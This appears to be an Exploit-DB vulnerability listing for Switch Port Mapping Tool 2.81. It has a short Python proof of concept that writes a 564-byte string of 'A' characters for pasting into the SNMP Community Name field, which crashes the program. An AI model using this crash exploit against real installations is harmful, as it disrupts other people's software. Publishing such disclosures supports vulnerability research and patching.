header-logo
Suggest Exploit
vendor:
Switch Port Mapping Tool
by:
Luis Martinez
7.5
CVSS
HIGH
Denial of Service (DoS) Local
400
CWE
Product Name: Switch Port Mapping Tool
Affected Version From: 2.81
Affected Version To: 2.81
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro x64 es
2018

Switch Port Mapping Tool 2.81 – ‘SNMP Community Name’ Denial of Service (PoC)

The Switch Port Mapping Tool version 2.81 is vulnerable to a Denial of Service (DoS) attack. By providing a specially crafted SNMP v1/v2c Read Community Name, an attacker can cause the application to crash.

Mitigation:

There is no known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-07-27
# Vendor Homepage: https://switchportmapper.com/
# Software Link : http://download.switchportmapper.com/spm281.zip
# Tested Version: 2.81
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python Managed_Switch_Port_Mapping_Tool_2.81.py
# 2.- Open Managed_Switch_Port_Mapping_Tool_2.81.txt and copy content to clipboard
# 3.- Open spmap.exe
# 4.- Switch Group > Settings
# 6.- Paste ClipBoard on "SNMP v1/v2c Read Community Name"
# 7.- OK
# 8.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 564
f = open ("Managed_Switch_Port_Mapping_Tool_2.81.txt", "w")
f.write(buffer)
f.close()